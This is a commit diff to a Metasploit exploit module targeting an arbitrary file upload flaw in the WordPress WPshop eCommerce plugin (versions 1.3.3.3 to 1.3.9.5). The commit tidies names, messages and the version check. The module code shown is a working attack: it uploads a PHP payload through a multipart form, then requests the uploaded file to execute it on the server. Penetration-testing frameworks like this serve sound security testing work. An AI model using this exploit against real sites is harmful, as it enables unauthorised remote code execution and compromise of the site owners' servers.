Do code cleanup

jvazquez-r7 · jvazquez-r7 · commit 558103b25db4 · 2015-04-24T11:30:08.000-05:00
diff --git a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb
@@ -13,15 +13,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Wordpress WPshop eCommerce Upload Vulnerability',
+      'Name'           => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
       'Description'    => %q{
-        This module exploits an arbitrary PHP code upload in the WordPress WPshop eCommerce plugin,
-        version 1.3.9.5. The vulnerability allows for arbitrary file upload and remote code execution.
+        This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
+        from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
+        code execution. This module has been tested successfully on WordPress WPshop eCommerce
+        1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
       },
       'Author'         =>
         [
-          'g0blin', # Vulnerability Discovery
-          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit Module
+          'g0blin', # Vulnerability Discovery, initial msf module
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit Module Pull Request
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -39,15 +41,15 @@ def initialize(info = {})
   end
 
   def check
-    check_plugin_version_from_readme('wpshop', '1.3.9.6')
+    check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
   end
 
   def exploit
-    php_pagename = rand_text_alpha(5 + rand(5)) + '.php'
+    php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
 
     data = Rex::MIME::Message.new
     data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_pagename}\"")
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
     post_data = data.to_s
 
     res = send_request_cgi(
@@ -58,19 +60,20 @@ def exploit
     )
 
     if res
-      if res.code == 200 && res.body =~ /#{php_pagename}/
-        print_good("#{peer} - Our payload is at: #{php_pagename}.")
-        register_files_for_cleanup(php_pagename)
+      if res.code == 200 && res.body =~ /#{php_page_name}/
+        print_good("#{peer} - Payload uploaded as #{php_page_name}")
+        register_files_for_cleanup(php_page_name)
       else
         fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
       end
     else
-      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+      fail_with(Failure::Unknown, "#{peer} - Server did not answer")
     end
 
     print_status("#{peer} - Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename)
+      { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
+      5
     )
   end
 end
